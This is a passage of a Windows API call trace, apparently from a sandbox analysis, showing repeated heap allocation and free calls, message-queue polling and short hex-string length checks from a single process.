lpMem=0x24b11c8 | out: hHeap=0x25c0000) returned 1 [0145.300] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a90c0 [0145.300] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b11c8 [0145.300] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9168 [0145.300] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9078 | out: hHeap=0x25c0000) returned 1 [0145.300] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9228 | out: hHeap=0x25c0000) returned 1 [0145.300] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9210 | out: hHeap=0x25c0000) returned 1 [0145.300] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a91f8 | out: hHeap=0x25c0000) returned 1 [0145.300] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9240 | out: hHeap=0x25c0000) returned 1 [0145.301] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b11a8 | out: hHeap=0x25c0000) returned 1 [0145.301] lstrlenW (lpString="6D") returned 2 [0145.301] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a90c0 | out: hHeap=0x25c0000) returned 1 [0145.301] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b11c8 | out: hHeap=0x25c0000) returned 1 [0145.301] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9168 | out: hHeap=0x25c0000) returned 1 [0145.301] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9180 | out: hHeap=0x25c0000) returned 1 [0145.301] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8fb8 | out: hHeap=0x25c0000) returned 1 [0145.301] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b11b8 | out: hHeap=0x25c0000) returned 1 [0145.301] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8fb8 [0145.301] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9180 [0145.301] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b11b8 [0145.301] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9198 | out: hHeap=0x25c0000) returned 1 [0145.301] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a90d8 | out: hHeap=0x25c0000) returned 1 [0145.301] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1188 | out: hHeap=0x25c0000) returned 1 [0145.301] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9180 | out: hHeap=0x25c0000) returned 1 [0145.301] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b11b8 | out: hHeap=0x25c0000) returned 1 [0145.301] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8fb8 | out: hHeap=0x25c0000) returned 1 [0145.301] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.301] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.301] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b11b8 [0145.301] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8fb8 [0145.301] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9180 [0145.301] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1188 [0145.301] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a90d8 [0145.301] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9198 [0145.302] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b11c8 [0145.302] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9168 [0145.302] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a90c0 [0145.302] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b11a8 [0145.302] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9240 [0145.302] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b11a8 | out: hHeap=0x25c0000) returned 1 [0145.302] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a91f8 [0145.302] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b11a8 [0145.302] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b11a8 | out: hHeap=0x25c0000) returned 1 [0145.302] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9210 [0145.302] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b11a8 [0145.302] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b11a8 | out: hHeap=0x25c0000) returned 1 [0145.302] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9228 [0145.302] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b11a8 [0145.302] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9078 [0145.302] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9240 | out: hHeap=0x25c0000) returned 1 [0145.302] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a90c0 | out: hHeap=0x25c0000) returned 1 [0145.302] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a91f8 | out: hHeap=0x25c0000) returned 1 [0145.302] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9210 | out: hHeap=0x25c0000) returned 1 [0145.302] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9168 | out: hHeap=0x25c0000) returned 1 [0145.302] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b11c8 | out: hHeap=0x25c0000) returned 1 [0145.302] lstrlenW (lpString="70") returned 2 [0145.302] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9228 | out: hHeap=0x25c0000) returned 1 [0145.302] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b11a8 | out: hHeap=0x25c0000) returned 1 [0145.302] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9078 | out: hHeap=0x25c0000) returned 1 [0145.302] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9198 | out: hHeap=0x25c0000) returned 1 [0145.302] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a90d8 | out: hHeap=0x25c0000) returned 1 [0145.302] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1188 | out: hHeap=0x25c0000) returned 1 [0145.303] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a90d8 [0145.303] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9198 [0145.303] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1188 [0145.303] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9180 | out: hHeap=0x25c0000) returned 1 [0145.303] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8fb8 | out: hHeap=0x25c0000) returned 1 [0145.303] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b11b8 | out: hHeap=0x25c0000) returned 1 [0145.303] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9198 | out: hHeap=0x25c0000) returned 1 [0145.303] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1188 | out: hHeap=0x25c0000) returned 1 [0145.303] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a90d8 | out: hHeap=0x25c0000) returned 1 [0145.303] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.303] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.303] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1188 [0145.303] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a90d8 [0145.303] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9198 [0145.303] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b11b8 [0145.303] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8fb8 [0145.303] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9180 [0145.303] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b11a8 [0145.303] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9078 [0145.303] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9228 [0145.303] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b11c8 [0145.303] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9168 [0145.303] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b11c8 | out: hHeap=0x25c0000) returned 1 [0145.303] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9210 [0145.303] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b11c8 [0145.303] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b11c8 | out: hHeap=0x25c0000) returned 1 [0145.303] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a91f8 [0145.304] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b11c8 [0145.304] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b11c8 | out: hHeap=0x25c0000) returned 1 [0145.304] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a90c0 [0145.304] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b11c8 [0145.304] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9240 [0145.304] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9168 | out: hHeap=0x25c0000) returned 1 [0145.304] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9228 | out: hHeap=0x25c0000) returned 1 [0145.304] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9210 | out: hHeap=0x25c0000) returned 1 [0145.304] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a91f8 | out: hHeap=0x25c0000) returned 1 [0145.304] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9078 | out: hHeap=0x25c0000) returned 1 [0145.304] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b11a8 | out: hHeap=0x25c0000) returned 1 [0145.304] lstrlenW (lpString="69") returned 2 [0145.304] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a90c0 | out: hHeap=0x25c0000) returned 1 [0145.304] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b11c8 | out: hHeap=0x25c0000) returned 1 [0145.304] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9240 | out: hHeap=0x25c0000) returned 1 [0145.304] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9180 | out: hHeap=0x25c0000) returned 1 [0145.304] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8fb8 | out: hHeap=0x25c0000) returned 1 [0145.304] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b11b8 | out: hHeap=0x25c0000) returned 1 [0145.304] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8fb8 [0145.304] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9180 [0145.304] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b11b8 [0145.304] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9198 | out: hHeap=0x25c0000) returned 1 [0145.304] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a90d8 | out: hHeap=0x25c0000) returned 1 [0145.304] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1188 | out: hHeap=0x25c0000) returned 1 [0145.304] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9180 | out: hHeap=0x25c0000) returned 1 [0145.304] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b11b8 | out: hHeap=0x25c0000) returned 1 [0145.304] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8fb8 | out: hHeap=0x25c0000) returned 1 [0145.304] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.305] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.305] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b11b8 [0145.305] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8fb8 [0145.305] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9180 [0145.305] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1188 [0145.305] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a90d8 [0145.305] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9198 [0145.305] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b11c8 [0145.305] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9240 [0145.305] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a90c0 [0145.305] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b11a8 | out: hHeap=0x25c0000) returned 1 [0145.305] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b11a8 | out: hHeap=0x25c0000) returned 1 [0145.305] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b11a8 | out: hHeap=0x25c0000) returned 1 [0145.305] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9078 | out: hHeap=0x25c0000) returned 1 [0145.305] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a90c0 | out: hHeap=0x25c0000) returned 1 [0145.305] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a91f8 | out: hHeap=0x25c0000) returned 1 [0145.305] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9210 | out: hHeap=0x25c0000) returned 1 [0145.305] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9240 | out: hHeap=0x25c0000) returned 1 [0145.305] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b11c8 | out: hHeap=0x25c0000) returned 1 [0145.305] lstrlenW (lpString="6C") returned 2 [0145.305] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9228 | out: hHeap=0x25c0000) returned 1 [0145.305] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b11a8 | out: hHeap=0x25c0000) returned 1 [0145.305] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9168 | out: hHeap=0x25c0000) returned 1 [0145.305] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9198 | out: hHeap=0x25c0000) returned 1 [0145.305] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a90d8 | out: hHeap=0x25c0000) returned 1 [0145.305] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1188 | out: hHeap=0x25c0000) returned 1 [0145.306] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9180 | out: hHeap=0x25c0000) returned 1 [0145.306] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8fb8 | out: hHeap=0x25c0000) returned 1 [0145.306] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b11b8 | out: hHeap=0x25c0000) returned 1 [0145.306] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a91c8 | out: hHeap=0x25c0000) returned 1 [0145.306] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9198 | out: hHeap=0x25c0000) returned 1 [0145.306] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1188 | out: hHeap=0x25c0000) returned 1 [0145.306] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a90d8 | out: hHeap=0x25c0000) returned 1 [0145.306] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.306] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.306] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b11c8 | out: hHeap=0x25c0000) returned 1 [0145.306] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b11c8 | out: hHeap=0x25c0000) returned 1 [0145.306] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b11c8 | out: hHeap=0x25c0000) returned 1 [0145.306] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9228 | out: hHeap=0x25c0000) returned 1 [0145.306] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9168 | out: hHeap=0x25c0000) returned 1 [0145.306] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9240 | out: hHeap=0x25c0000) returned 1 [0145.306] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9210 | out: hHeap=0x25c0000) returned 1 [0145.306] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9180 | out: hHeap=0x25c0000) returned 1 [0145.306] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b11a8 | out: hHeap=0x25c0000) returned 1 [0145.306] lstrlenW (lpString="65") returned 2 [0145.306] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a91f8 | out: hHeap=0x25c0000) returned 1 [0145.306] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b11c8 | out: hHeap=0x25c0000) returned 1 [0145.306] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a90c0 | out: hHeap=0x25c0000) returned 1 [0145.306] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8fb8 | out: hHeap=0x25c0000) returned 1 [0145.306] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a91c8 | out: hHeap=0x25c0000) returned 1 [0145.306] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b11b8 | out: hHeap=0x25c0000) returned 1 [0145.306] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9198 | out: hHeap=0x25c0000) returned 1 [0145.307] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a90d8 | out: hHeap=0x25c0000) returned 1 [0145.307] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1188 | out: hHeap=0x25c0000) returned 1 [0145.307] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8fb8 | out: hHeap=0x25c0000) returned 1 [0145.307] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b11b8 | out: hHeap=0x25c0000) returned 1 [0145.307] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a91c8 | out: hHeap=0x25c0000) returned 1 [0145.307] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.307] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.307] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.307] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.307] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.307] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.307] CharUpperBuffW (in: lpsz="A2200004C22", cchLength=0xb | out: lpsz="A2200004C22") returned 0xb [0145.307] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.307] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.307] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.307] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.307] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.307] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.307] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.307] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.307] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.308] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.308] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.308] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.308] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.308] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.308] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.308] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.308] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.308] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.308] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.308] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.308] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.308] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.308] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.308] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.308] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.308] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.308] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.308] CharUpperBuffW (in: lpsz="A2200004C22", cchLength=0xb | out: lpsz="A2200004C22") returned 0xb [0145.308] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.308] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.308] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.309] PeekMessageW (in: 